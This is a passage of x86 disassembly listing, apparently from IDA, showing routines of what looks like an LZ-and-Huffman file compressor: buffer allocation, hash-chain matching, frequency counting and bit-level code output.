mov eax, dword_10076374
test eax, eax
jnz short locret_1001B7E7
push esi
mov esi, ds:malloc
push 4100h ; Size
call esi ; malloc
push 2100h ; Size
mov dword_1007636C, eax
call esi ; malloc
push 2100h ; Size
mov dword_10076368, eax
call esi ; malloc
push 4200h ; Size
mov dword_10076354, eax
call esi ; malloc
push 8000h ; Size
mov dword_1007634C, eax
call esi ; malloc
push 8000h ; Size
mov dword_1007635C, eax
call esi ; malloc
push 0E1E0h ; Size
mov dword_10076364, eax
call esi ; malloc
add esp, 1Ch
mov dword_10076374, eax
test eax, eax
pop esi
jnz short locret_1001B7E7
push offset aOutOfMemory_ ; "Out of memory."
call sub_1001B270
; ---------------------------------------------------------------------------
db 59h ; Y
; ---------------------------------------------------------------------------
locret_1001B7E7: ; CODE XREF: sub_1001B770+7�j
; sub_1001B770+6A�j
retn
sub_1001B770 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B7F0 proc near ; CODE XREF: sub_1001B640+5�p
mov eax, 2000h
mov ecx, 100h
loc_1001B7FA: ; CODE XREF: sub_1001B7F0+24�j
mov edx, dword_10076368
inc eax
dec ecx
mov byte ptr [eax+edx-1], 1
mov edx, dword_1007634C
mov word ptr [edx+eax*2-2], 0
jnz short loc_1001B7FA
mov eax, 4000h
mov ecx, 2000h
loc_1001B820: ; CODE XREF: sub_1001B7F0+41�j
mov edx, dword_1007635C
add eax, 2
dec ecx
mov word ptr [eax+edx-2], 0
jnz short loc_1001B820
mov word ptr dword_10076360, 1
mov eax, 1
mov ecx, 2
loc_1001B846: ; CODE XREF: sub_1001B7F0+68�j
mov edx, dword_10076374
inc eax
mov [ecx+edx], ax
add ecx, 2
cmp ax, 1FFFh
jb short loc_1001B846
mov eax, dword_10076374
mov ecx, 30F0h
mov word ptr [eax+3FFEh], 0
mov eax, 8000h
loc_1001B872: ; CODE XREF: sub_1001B7F0+93�j
mov edx, dword_10076374
add eax, 2
dec ecx
mov word ptr [eax+edx-2], 0
jnz short loc_1001B872
retn
sub_1001B7F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B890 proc near ; CODE XREF: sub_1001B640+59�p
; sub_1001BBB0+84�j
var_4 = dword ptr -4
push ecx
push ebx
push ebp
mov ebp, dword_10076350
push esi
cmp ebp, 4
push edi
jl loc_1001B972
mov eax, dword_10076358
dec ebp
inc eax
mov esi, dword_1007635C
or ah, 20h
mov dword_10076350, ebp
movsx ecx, ax
shl ecx, 1
mov di, [ecx+esi]
test di, di
jnz short loc_1001B8E0
mov edx, dword_10076374
loc_1001B8CE: ; CODE XREF: sub_1001B890+4E�j
mov ax, [ecx+edx]
movsx ecx, ax
shl ecx, 1
mov di, [ecx+esi]
test di, di
jz short loc_1001B8CE
loc_1001B8E0: ; CODE XREF: sub_1001B890+36�j
mov edx, dword_10076368
xor ebx, ebx
movsx ecx, di
mov bl, [ecx+edx]
cmp ebx, ebp
jl short loc_1001B904
loc_1001B8F2: ; CODE XREF: sub_1001B890+72�j
mov eax, edi
mov di, [esi+ecx*2]
movsx ecx, di
xor ebx, ebx
mov bl, [ecx+edx]
cmp ebx, ebp
jge short loc_1001B8F2
loc_1001B904: ; CODE XREF: sub_1001B890+60�j
mov edx, dword_1007634C
mov esi, edi
movsx ecx, di
shl ecx, 1
add edx, ecx
cmp word ptr [edx], 0
jge short loc_1001B946
loc_1001B919: ; CODE XREF: sub_1001B890+AE�j
mov si, word ptr dword_10076358+2
mov [edx], si
mov edx, dword_1007635C
mov si, [ecx+edx]
mov edx, dword_1007634C
movsx ecx, si
shl ecx, 1
add edx, ecx
cmp word ptr [edx], 0
jl short loc_1001B919
mov ebp, dword_10076350
loc_1001B946: ; CODE XREF: sub_1001B890+87�j
cmp si, 2000h
jnb loc_1001B9D1
mov cx, word ptr dword_10076358+2
movsx edx, si
mov esi, dword_1007634C
or cx, 8000h
mov [esi+edx*2], cx
mov ebp, dword_10076350
jmp short loc_1001B9D1
; ---------------------------------------------------------------------------
loc_1001B972: ; CODE XREF: sub_1001B890+E�j
movsx eax, word ptr dword_10076358+2
mov ecx, dword_1007636C
add eax, ecx
mov dl, [eax+1]
movzx di, byte ptr [eax]
mov byte ptr [esp+14h+var_4], dl
add edi, 2000h
mov esi, [esp+14h+var_4]
push esi
push edi
call sub_1001BB50
add esp, 8
test ax, ax
jnz short loc_1001B9C6
mov ax, word ptr dword_10076358+2
push eax
push esi
push edi
call sub_1001B5C0
add esp, 0Ch
mov dword_10076350, 1
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_1001B9C6: ; CODE XREF: sub_1001B890+113�j
mov ebp, 2
loc_1001B9CB: ; CODE XREF: sub_1001B890+200�j
mov dword_10076350, ebp
loc_1001B9D1: ; CODE XREF: sub_1001B890+BB�j
; sub_1001B890+E0�j
cmp ax, 2000h
jb short loc_1001B9E4
mov [esp+14h+var_4], 100h
mov cx, ax
jmp short loc_1001BA07
; ---------------------------------------------------------------------------
loc_1001B9E4: ; CODE XREF: sub_1001B890+145�j
mov edx, dword_10076368
movsx ecx, ax
movzx dx, byte ptr [ecx+edx]
mov word ptr [esp+14h+var_4], dx
mov edx, dword_1007634C
mov cx, [edx+ecx*2]
and ecx, 7FFFh
loc_1001BA07: ; CODE XREF: sub_1001B890+152�j
mov bx, word ptr dword_10076358+2
mov word ptr dword_10076358, cx
cmp cx, bx
jl short loc_1001BA26
add cx, 0E000h
mov word ptr dword_10076358, cx
loc_1001BA26: ; CODE XREF: sub_1001B890+188�j
mov edx, dword_1007636C
movsx esi, bx
movsx ecx, cx
add esi, edx
add ecx, edx
movsx edx, word ptr [esp+14h+var_4]
add esi, ebp
add ecx, ebp
cmp ebp, edx
jge short loc_1001BA5D
loc_1001BA43: ; CODE XREF: sub_1001B890+1C4�j
mov bl, [esi]
cmp bl, [ecx]
jnz short loc_1001BA95
inc ebp
inc esi
inc ecx
cmp ebp, edx
mov dword_10076350, ebp
jl short loc_1001BA43
mov bx, word ptr dword_10076358+2
loc_1001BA5D: ; CODE XREF: sub_1001B890+1B1�j
cmp ebp, 100h
jge short loc_1001BAA4
mov edx, dword_1007634C
mov edi, eax
movsx ecx, ax
mov [edx+ecx*2], bx
mov cl, [esi]
push ecx
push eax
call sub_1001BB50
add esp, 8
test ax, ax
jz loc_1001BB2B
mov ebp, dword_10076350
inc ebp
jmp loc_1001B9CB
; ---------------------------------------------------------------------------
loc_1001BA95: ; CODE XREF: sub_1001B890+1B7�j
push eax
call sub_1001B4E0
add esp, 4
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_1001BAA4: ; CODE XREF: sub_1001B890+1D3�j
mov edx, dword_10076364
movsx eax, ax
shl eax, 1
movsx esi, bx
mov cx, [eax+edx]
mov [edx+esi*2], cx
mov si, word ptr dword_10076358+2
movsx edx, cx
mov ecx, dword_10076374
mov [ecx+edx*2], si
mov edx, dword_10076374
movsx esi, word ptr dword_10076358+2
mov cx, [eax+edx]
mov [edx+esi*2], cx
mov esi, dword_10076364
movsx edx, cx
mov cx, word ptr dword_10076358+2
mov [esi+edx*2], cx
mov ecx, dword_1007635C
movsx edx, word ptr dword_10076358+2
mov [ecx+edx*2], di
mov edx, dword_1007635C
pop edi
pop esi
mov word ptr [eax+edx], 0
mov ecx, dword_10076374
mov dx, word ptr dword_10076358+2
pop ebp
mov [eax+ecx], dx
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_1001BB2B: ; CODE XREF: sub_1001B890+1F3�j
mov ax, word ptr dword_10076358+2
mov cl, [esi]
push eax
push ecx
push edi
call sub_1001B5C0
add esp, 0Ch
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_1001B890 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001BB50 proc near ; CODE XREF: sub_1001B890+108�p
; sub_1001B890+1E8�p ...
arg_0 = word ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov dx, [esp+arg_0]
and eax, 0FFh
push esi
add eax, 400h
movsx ecx, dx
shl eax, 4
add eax, ecx
mov ecx, dword_10076374
mov ax, [ecx+eax*2]
mov ecx, dword_1007635C
mov [ecx], dx
mov esi, dword_1007635C
movsx ecx, ax
shl ecx, 1
cmp [ecx+esi], dx
jz short loc_1001BBA7
push edi
mov edi, dword_10076374
loc_1001BB97: ; CODE XREF: sub_1001BB50+54�j
mov ax, [ecx+edi]
movsx ecx, ax
shl ecx, 1
cmp [ecx+esi], dx
jnz short loc_1001BB97
pop edi
loc_1001BBA7: ; CODE XREF: sub_1001BB50+3E�j
pop esi
retn
sub_1001BB50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001BBB0 proc near ; CODE XREF: sub_1001B640+95�p
; sub_1001B640:loc_1001B71E�p
mov eax, dword_10076370
dec eax
mov dword_10076370, eax
mov ax, word ptr dword_10076358+2
inc ax
cmp ax, 4000h
mov word ptr dword_10076358+2, ax
jnz short loc_1001BC2F
mov eax, dword_1007636C
push 2100h ; Size
lea ecx, [eax+2000h]
push ecx ; Src
push eax ; Dst
call ds:memmove ; memmove
mov edx, dword_1007633C
mov eax, dword_1007636C
push edx ; File
add eax, 2100h
push 2000h ; Count
push eax ; DstBuf
call sub_1001B3E0
mov ecx, dword_10076370
mov word ptr dword_10076358+2, 2000h
add ecx, eax
mov dword_10076370, ecx
mov ecx, ds:_iob
add ecx, 40h
push ecx ; File
push 2Eh ; Ch
call ds:putc ; putc
add esp, 20h
loc_1001BC2F: ; CODE XREF: sub_1001BBB0+1D�j
call sub_1001BC40
jmp sub_1001B890
sub_1001BBB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001BC40 proc near ; CODE XREF: sub_1001BBB0:loc_1001BC2F�p
var_4 = dword ptr -4
push ecx
movsx ecx, word ptr dword_10076358+2
mov eax, dword_1007635C
push esi
shl ecx, 1
cmp word ptr [ecx+eax], 0
jz loc_1001BE3E
mov edx, dword_10076364
mov ax, [ecx+edx]
mov edx, dword_10076374
movsx esi, ax
mov cx, [ecx+edx]
mov [edx+esi*2], cx
mov edx, dword_10076364
movsx ecx, cx
mov [edx+ecx*2], ax
mov ecx, dword_1007635C
movsx eax, word ptr dword_10076358+2
lea eax, [ecx+eax*2]
mov cx, [eax]
mov word ptr [eax], 0
cmp cx, 2000h
mov [esp+8+var_4], ecx
jnb loc_1001BE3E
mov eax, dword_10076354
movsx esi, cx
mov cl, [esi+eax]
dec cl
mov [esi+eax], cl
mov edx, dword_10076354
cmp byte ptr [esi+edx], 1
ja loc_1001BE3E
push ebx
mov ebx, dword_1007634C
push ebp
push edi
mov bp, [ebx+esi*2]
and ebp, 7FFFh
cmp bp, word ptr dword_10076358+2
jl short loc_1001BCEC
sub ebp, 2000h
loc_1001BCEC: ; CODE XREF: sub_1001BC40+A4�j
mov eax, dword_1007635C
mov edi, ebp
mov dx, [eax+esi*2]
movsx eax, dx
shl eax, 1
mov cx, [eax+ebx]
test ch, 80h
jz short loc_1001BD48
loc_1001BD05: ; CODE XREF: sub_1001BC40+106�j
and ecx, 7FFFh
cmp cx, word ptr dword_10076358+2
jl short loc_1001BD1A
sub ecx, 2000h
loc_1001BD1A: ; CODE XREF: sub_1001BC40+D2�j
cmp cx, di
jle short loc_1001BD21
mov edi, ecx
loc_1001BD21: ; CODE XREF: sub_1001BC40+DD�j
mov ecx, edi
or ch, 20h
mov [eax+ebx], cx
mov edx, dword_1007635C
mov ebx, dword_1007634C
mov dx, [eax+edx]
movsx eax, dx
shl eax, 1
mov cx, [eax+ebx]
test ch, 80h
jnz short loc_1001BD05
loc_1001BD48: ; CODE XREF: sub_1001BC40+C3�j
cmp dx, 2000h
jnb short loc_1001BD72
cmp cx, word ptr dword_10076358+2
jl short loc_1001BD5E
sub ecx, 2000h
loc_1001BD5E: ; CODE XREF: sub_1001BC40+116�j
cmp cx, di
jle short loc_1001BD65
mov edi, ecx
loc_1001BD65: ; CODE XREF: sub_1001BC40+121�j
movsx eax, dx
or edi, 0FFFFA000h
mov [ebx+eax*2], di
loc_1001BD72: ; CODE XREF: sub_1001BC40+10D�j
mov edx, dword_10076368
xor ecx, ecx
movsx eax, bp
mov cl, [esi+edx]
mov edx, dword_1007636C
add edx, ecx
mov ecx, [esp+14h+var_4]
mov al, [eax+edx]
push eax
push ecx
call sub_1001BB50
mov edx, dword_10076364
mov ebx, dword_10076374
movsx ecx, ax
add esp, 8
shl ecx, 1
mov dx, [ecx+edx]
mov di, [ecx+ebx]
movsx ebp, dx
mov [ebx+ebp*2], di
mov ebx, dword_10076364
movsx edi, di
mov [ebx+edi*2], dx
mov edx, dword_10076364
mov ebx, dword_10076374
mov dx, [edx+esi*2]
movsx edi, dx
mov [ebx+edi*2], ax
mov edi, dword_10076364
mov [ecx+edi], dx
mov edx, dword_10076374
mov ebx, dword_10076364
mov dx, [edx+esi*2]
movsx edi, dx
mov [ebx+edi*2], ax
mov eax, dword_10076374
pop edi
pop ebp
mov [ecx+eax], dx
mov eax, dword_1007635C
pop ebx
mov dx, [eax+esi*2]
mov [ecx+eax], dx
mov eax, dword_1007635C
mov word ptr [eax+esi*2], 0
mov edx, dword_10076374
mov cx, word ptr dword_10076360
mov ax, word ptr [esp+8+var_4]
mov [edx+esi*2], cx
mov word ptr dword_10076360, ax
loc_1001BE3E: ; CODE XREF: sub_1001BC40+15�j
; sub_1001BC40+64�j ...
pop esi
pop ecx
retn
sub_1001BC40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001BE50 proc near ; CODE XREF: sub_1001B640+D1�p
; sub_1001B640+112�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, dword_1007637C
push esi
shr eax, 1
mov dword_1007637C, eax
jnz short loc_1001BEA6
mov eax, dword_1007A430
mov dword_1007637C, 80h
lea ecx, [eax-18h]
mov eax, dword_10079C08
cmp eax, ecx
jb short loc_1001BE8E
call sub_1001BF50
mov eax, dword_1007411C
test eax, eax
jnz loc_1001BF40
xor eax, eax
loc_1001BE8E: ; CODE XREF: sub_1001BE50+28�j
mov edx, dword_10076378
mov ecx, eax
inc eax
mov dword_10079BB8, ecx
mov dword_10079C08, eax
mov byte ptr [edx+ecx], 0
loc_1001BEA6: ; CODE XREF: sub_1001BE50+D�j
mov ecx, dword_10079C08
mov edx, dword_10076378
mov eax, [esp+4+arg_0]
mov [edx+ecx], al
mov esi, dword_10079C08
inc esi
inc word_10076B78[eax*2]
cmp eax, 100h
mov dword_10079C08, esi
jb short loc_1001BF40
mov eax, dword_10076378
mov ecx, dword_10079BB8
mov dl, byte ptr dword_1007637C
push ebx
mov bl, [eax+ecx]
or bl, dl
mov [eax+ecx], bl
mov eax, [esp+8+arg_4]
mov edx, dword_10079C08
mov esi, dword_10076378
mov ecx, eax
pop ebx
shr ecx, 8
mov [esi+edx], cl
mov ecx, dword_10079C08
mov edx, dword_10076378
inc ecx
mov dword_10079C08, ecx
mov [edx+ecx], al
mov esi, dword_10079C08
inc esi
xor ecx, ecx
test eax, eax
mov dword_10079C08, esi
jz short loc_1001BF38
loc_1001BF31: ; CODE XREF: sub_1001BE50+E6�j
shr eax, 1
inc ecx
test eax, eax
jnz short loc_1001BF31
loc_1001BF38: ; CODE XREF: sub_1001BE50+DF�j
inc word_10077388[ecx*2]
loc_1001BF40: ; CODE XREF: sub_1001BE50+36�j
; sub_1001BE50+83�j
pop esi
retn
sub_1001BE50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001BF50 proc near ; CODE XREF: sub_1001BE50+2A�p
; sub_1001C4D0+9�p
var_4 = dword ptr -4
push ecx
push ebx
push esi
push edi
push offset word_1007A034
push offset byte_10079E0C
push offset word_10076B78
push 1FEh
call sub_1001C4F0
mov esi, eax
xor edi, edi
mov di, word_10076B78[esi*2]
push edi
push 10h
call sub_1001B2F0
add esp, 18h
cmp esi, 1FEh
jb short loc_1001BFE1
call sub_1001C0F0
push offset dword_1007A00C
push offset dword_10077374
push offset word_10079BBC
push 13h
call sub_1001C4F0
mov esi, eax
add esp, 10h
cmp esi, 13h
jb short loc_1001BFC6
push 3
push 5
push 13h
call sub_1001C190
add esp, 0Ch
call sub_1001C230
jmp short loc_1001C007
; ---------------------------------------------------------------------------
loc_1001BFC6: ; CODE XREF: sub_1001BF50+5F�j
push 0
push 5
call sub_1001B2F0
push esi
push 5
call sub_1001B2F0
add esp, 10h
call sub_1001C230
jmp short loc_1001C007
; ---------------------------------------------------------------------------
loc_1001BFE1: ; CODE XREF: sub_1001BF50+3A�j
push 0
push 5
call sub_1001B2F0
push 0
push 5
call sub_1001B2F0
push 0
push 9
call sub_1001B2F0
push esi
push 9
call sub_1001B2F0
add esp, 20h
loc_1001C007: ; CODE XREF: sub_1001BF50+74�j
; sub_1001BF50+8F�j
push offset dword_1007A00C
push offset dword_10077374
push offset word_10077388
push 0Eh
call sub_1001C4F0
mov esi, eax
add esp, 10h
cmp esi, 0Eh
jb short loc_1001C037
push 0FFFFFFFFh
push 4
push 0Eh
call sub_1001C190
add esp, 0Ch
jmp short loc_1001C04B
; ---------------------------------------------------------------------------
loc_1001C037: ; CODE XREF: sub_1001BF50+D5�j
push 0
push 4
call sub_1001B2F0
push esi
push 4
call sub_1001B2F0
add esp, 10h
loc_1001C04B: ; CODE XREF: sub_1001BF50+E5�j
xor esi, esi
test edi, edi
mov [esp+10h+var_4], esi
jbe short loc_1001C0CE
mov ebx, [esp+10h+var_4]
loc_1001C059: ; CODE XREF: sub_1001BF50+17C�j
test byte ptr [esp+10h+var_4], 7
mov eax, dword_10076378
jnz short loc_1001C06D
xor ebx, ebx
mov bl, [eax+esi]
inc esi
jmp short loc_1001C06F
; ---------------------------------------------------------------------------
loc_1001C06D: ; CODE XREF: sub_1001BF50+113�j
shl ebx, 1
loc_1001C06F: ; CODE XREF: sub_1001BF50+11B�j
test bl, 80h
jz short loc_1001C0A7
xor ecx, ecx
mov cl, [eax+esi]
mov eax, ecx
add eax, 100h
inc esi
push eax
call sub_1001C390
mov ecx, dword_10076378
xor eax, eax
xor edx, edx
mov ah, [ecx+esi]
mov dl, [ecx+esi+1]
inc esi
add eax, edx
push eax
inc esi
call sub_1001C3C0
add esp, 8
jmp short loc_1001C0B8
; ---------------------------------------------------------------------------
loc_1001C0A7: ; CODE XREF: sub_1001BF50+122�j
xor ecx, ecx
mov cl, [eax+esi]
inc esi
mov eax, ecx
push eax
call sub_1001C390
add esp, 4
loc_1001C0B8: ; CODE XREF: sub_1001BF50+155�j
mov eax, dword_1007411C
test eax, eax
jnz short loc_1001C0E8
mov eax, [esp+10h+var_4]
inc eax
cmp eax, edi
mov [esp+10h+var_4], eax
jb short loc_1001C059
loc_1001C0CE: ; CODE XREF: sub_1001BF50+103�j
mov ecx, 0FFh
xor eax, eax
mov edi, offset word_10076B78
rep stosd
mov ecx, 7
mov edi, offset word_10077388
rep stosd
loc_1001C0E8: ; CODE XREF: sub_1001BF50+16F�j
pop edi
pop esi
pop ebx
pop ecx
retn
sub_1001BF50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C0F0 proc near ; CODE XREF: sub_1001BF50+3C�p
push edi
mov ecx, 9
xor eax, eax
mov edi, offset word_10079BBC
rep stosd
stosw
mov edx, 1FEh
mov eax, offset byte_1007A009
sub eax, edx
pop edi
loc_1001C10E: ; CODE XREF: sub_1001C0F0+27�j
cmp byte ptr [eax+edx], 0
jnz short loc_1001C119
dec edx
test edx, edx
jg short loc_1001C10E
loc_1001C119: ; CODE XREF: sub_1001C0F0+22�j
xor eax, eax
test edx, edx
jle short locret_1001C18D
push ebx
loc_1001C120: ; CODE XREF: sub_1001C0F0+9A�j
xor ecx, ecx
mov cl, byte_10079E0C[eax]
inc eax
test ecx, ecx
jnz short loc_1001C180
cmp eax, edx
mov ecx, 1
jge short loc_1001C14B
loc_1001C136: ; CODE XREF: sub_1001C0F0+54�j
mov bl, byte_10079E0C[eax]
test bl, bl
jnz short loc_1001C146
inc eax
inc ecx
cmp eax, edx
jl short loc_1001C136
loc_1001C146: ; CODE XREF: sub_1001C0F0+4E�j
cmp ecx, 2
jg short loc_1001C154
loc_1001C14B: ; CODE XREF: sub_1001C0F0+44�j
add word_10079BBC, cx
jmp short loc_1001C188
; ---------------------------------------------------------------------------
loc_1001C154: ; CODE XREF: sub_1001C0F0+59�j
cmp ecx, 12h
jg short loc_1001C162
inc word_10079BBE
jmp short loc_1001C188
; ---------------------------------------------------------------------------
loc_1001C162: ; CODE XREF: sub_1001C0F0+67�j
cmp ecx, 13h
jnz short loc_1001C177
inc word_10079BBC
inc word_10079BBE
jmp short loc_1001C188
; ---------------------------------------------------------------------------
loc_1001C177: ; CODE XREF: sub_1001C0F0+75�j
inc word_10079BC0
jmp short loc_1001C188
; ---------------------------------------------------------------------------
loc_1001C180: ; CODE XREF: sub_1001C0F0+3B�j
inc word_10079BC0[ecx*2]
loc_1001C188: ; CODE XREF: sub_1001C0F0+62�j
; sub_1001C0F0+70�j ...
cmp eax, edx
jl short loc_1001C120
pop ebx
locret_1001C18D: ; CODE XREF: sub_1001C0F0+2D�j
retn
sub_1001C0F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C190 proc near ; CODE XREF: sub_1001BF50+67�p
; sub_1001BF50+DD�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
test edi, edi
jle short loc_1001C1AB
mov eax, offset dword_10077374
dec eax
loc_1001C1A0: ; CODE XREF: sub_1001C190+19�j
cmp byte ptr [eax+edi], 0
jnz short loc_1001C1AB
dec edi
test edi, edi
jg short loc_1001C1A0
loc_1001C1AB: ; CODE XREF: sub_1001C190+8�j
; sub_1001C190+14�j
mov eax, [esp+8+arg_4]
push edi
push eax
call sub_1001B2F0
add esp, 8
xor esi, esi
test edi, edi
jle short loc_1001C220
push ebx
mov ebx, [esp+0Ch+arg_8]
loc_1001C1C4: ; CODE XREF: sub_1001C190+8D�j
xor eax, eax
mov al, byte ptr dword_10077374[esi]
inc esi
cmp eax, 6
jg short loc_1001C1D7
push eax
push 3
jmp short loc_1001C1E9
; ---------------------------------------------------------------------------
loc_1001C1D7: ; CODE XREF: sub_1001C190+40�j
lea ecx, [eax-3]
mov edx, 1
shl edx, cl
sub edx, 2
add eax, 0FFFFFFFDh
push edx
push eax
loc_1001C1E9: ; CODE XREF: sub_1001C190+45�j
call sub_1001B2F0
add esp, 8
cmp esi, ebx
jnz short loc_1001C21B
cmp esi, 6
jge short loc_1001C20A
loc_1001C1FA: ; CODE XREF: sub_1001C190+78�j
mov al, byte ptr dword_10077374[esi]
test al, al
jnz short loc_1001C20A
inc esi
cmp esi, 6
jl short loc_1001C1FA
loc_1001C20A: ; CODE XREF: sub_1001C190+68�j
; sub_1001C190+72�j
lea eax, [esi+1]
and eax, 3
push eax
push 2
call sub_1001B2F0
add esp, 8
loc_1001C21B: ; CODE XREF: sub_1001C190+63�j
cmp esi, edi
jl short loc_1001C1C4
pop ebx
loc_1001C220: ; CODE XREF: sub_1001C190+2D�j
pop edi
pop esi
retn
sub_1001C190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C230 proc near ; CODE XREF: sub_1001BF50+6F�p
; sub_1001BF50+8A�p
push ebx
mov ebx, 1FEh
mov eax, offset byte_1007A009
push edi
sub eax, ebx
loc_1001C23E: ; CODE XREF: sub_1001C230+17�j
cmp byte ptr [eax+ebx], 0
jnz short loc_1001C249
dec ebx
test ebx, ebx
jg short loc_1001C23E
loc_1001C249: ; CODE XREF: sub_1001C230+12�j
push ebx
push 9
call sub_1001B2F0
add esp, 8
xor edi, edi
test ebx, ebx
jle loc_1001C385
push esi
loc_1001C25F: ; CODE XREF: sub_1001C230+14E�j
xor eax, eax
mov al, byte_10079E0C[edi]
inc edi
test eax, eax
jnz loc_1001C360
cmp edi, ebx
mov esi, 1
jge short loc_1001C296
loc_1001C279: ; CODE XREF: sub_1001C230+57�j
mov al, byte_10079E0C[edi]
test al, al
jnz short loc_1001C289
inc edi
inc esi
cmp edi, ebx
jl short loc_1001C279
loc_1001C289: ; CODE XREF: sub_1001C230+51�j
cmp esi, 2
jg short loc_1001C2BE
test esi, esi
jle loc_1001C37C
loc_1001C296: ; CODE XREF: sub_1001C230+47�j
; sub_1001C230+87�j
mov eax, dword_1007A00C
mov ecx, dword_10077374
and eax, 0FFFFh
and ecx, 0FFh
push eax
push ecx
call sub_1001B2F0
add esp, 8
dec esi
jnz short loc_1001C296
jmp loc_1001C37C
; ---------------------------------------------------------------------------
loc_1001C2BE: ; CODE XREF: sub_1001C230+5C�j
cmp esi, 12h
jg short loc_1001C2ED
xor edx, edx
xor eax, eax
mov dx, word ptr dword_1007A00C+2
mov al, byte ptr dword_10077374+1
push edx
push eax
call sub_1001B2F0
add esi, 0FFFFFFFDh
push esi
push 4
call sub_1001B2F0
add esp, 10h
jmp loc_1001C37C
; ---------------------------------------------------------------------------
loc_1001C2ED: ; CODE XREF: sub_1001C230+91�j
cmp esi, 13h
jnz short loc_1001C336
mov ecx, dword_1007A00C
mov edx, dword_10077374
and ecx, 0FFFFh
and edx, 0FFh
push ecx
push edx
call sub_1001B2F0
xor eax, eax
xor ecx, ecx
mov ax, word ptr dword_1007A00C+2
mov cl, byte ptr dword_10077374+1
push eax
push ecx
call sub_1001B2F0
push 0Fh
push 4
call sub_1001B2F0
add esp, 18h
jmp short loc_1001C37C
; ---------------------------------------------------------------------------
loc_1001C336: ; CODE XREF: sub_1001C230+C0�j
mov edx, dword_1007A010
xor eax, eax
mov al, byte ptr dword_10077374+2
and edx, 0FFFFh
push edx
push eax
call sub_1001B2F0
add esi, 0FFFFFFECh
push esi
push 9
call sub_1001B2F0
add esp, 10h
jmp short loc_1001C37C
; ---------------------------------------------------------------------------
loc_1001C360: ; CODE XREF: sub_1001C230+3A�j
xor ecx, ecx
xor edx, edx
mov cx, word ptr dword_1007A010[eax*2]
mov dl, byte ptr (dword_10077374+2)[eax]
push ecx
push edx
call sub_1001B2F0
add esp, 8
loc_1001C37C: ; CODE XREF: sub_1001C230+60�j
; sub_1001C230+89�j ...
cmp edi, ebx
jl loc_1001C25F
pop esi
loc_1001C385: ; CODE XREF: sub_1001C230+28�j
pop edi
pop ebx
retn
sub_1001C230 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C390 proc near ; CODE XREF: sub_1001BF50+132�p
; sub_1001BF50+160�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
xor edx, edx
mov cx, word_1007A034[eax*2]
mov dl, byte_10079E0C[eax]
push ecx
push edx
call sub_1001B2F0
add esp, 8
retn
sub_1001C390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C3C0 proc near ; CODE XREF: sub_1001BF50+14D�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
test edi, edi
mov eax, edi
jz short loc_1001C3D5
loc_1001C3CE: ; CODE XREF: sub_1001C3C0+13�j
shr eax, 1
inc esi
test eax, eax
jnz short loc_1001C3CE
loc_1001C3D5: ; CODE XREF: sub_1001C3C0+C�j
xor eax, eax
xor ecx, ecx
mov ax, word ptr dword_1007A00C[esi*2]
mov cl, byte ptr dword_10077374[esi]
push eax
push ecx
call sub_1001B2F0
add esp, 8
cmp esi, 1
jbe short loc_1001C411
mov ecx, 11h
mov edx, 0FFFFh
sub ecx, esi
shr edx, cl
and edx, edi
dec esi
push edx
push esi
call sub_1001B2F0
add esp, 8
loc_1001C411: ; CODE XREF: sub_1001C3C0+34�j
pop edi
pop esi
retn
sub_1001C3C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C420 proc near ; CODE XREF: sub_1001B640+A�p
mov eax, dword_1007A430
push esi
test eax, eax
push edi
jnz short loc_1001C48E
mov esi, ds:malloc
push 4000h ; Size
mov dword_1007A430, 4000h
call esi ; malloc
add esp, 4
mov dword_10076378, eax
test eax, eax
jnz short loc_1001C493
loc_1001C44E: ; CODE XREF: sub_1001C420+6A�j
mov eax, 0CCCCCCCDh
mul dword_1007A430
shr edx, 3
lea eax, [edx+edx*8]
cmp eax, 1000h
mov dword_1007A430, eax
jnb short loc_1001C47D
push offset aOutOfMemory_ ; "Out of memory."
call sub_1001B270
; ---------------------------------------------------------------------------
db 0A1h ; ¡
db 30h ; 0 OFF32 SEGDEF [_data,1007A430]
db 0A4h ; ¤
db 7
db 10h
db 83h ; ƒ
db 0C4h ; Ä
db 4
; ---------------------------------------------------------------------------
loc_1001C47D: ; CODE XREF: sub_1001C420+49�j
push eax ; Size
call esi ; malloc
add esp, 4
mov dword_10076378, eax
test eax, eax
jz short loc_1001C44E
jmp short loc_1001C493
; ---------------------------------------------------------------------------
loc_1001C48E: ; CODE XREF: sub_1001C420+9�j
mov eax, dword_10076378
loc_1001C493: ; CODE XREF: sub_1001C420+2C�j
; sub_1001C420+6C�j
mov byte ptr [eax], 0
mov ecx, 0FFh
xor eax, eax
mov edi, offset word_10076B78
rep stosd
mov ecx, 7
mov edi, offset word_10077388
rep stosd
mov dword_1007637C, eax
mov dword_10079C08, eax
call sub_1001B4C0
pop edi
pop esi
retn
sub_1001C420 endp
; ---------------------------------------------------------------------------
align 10h
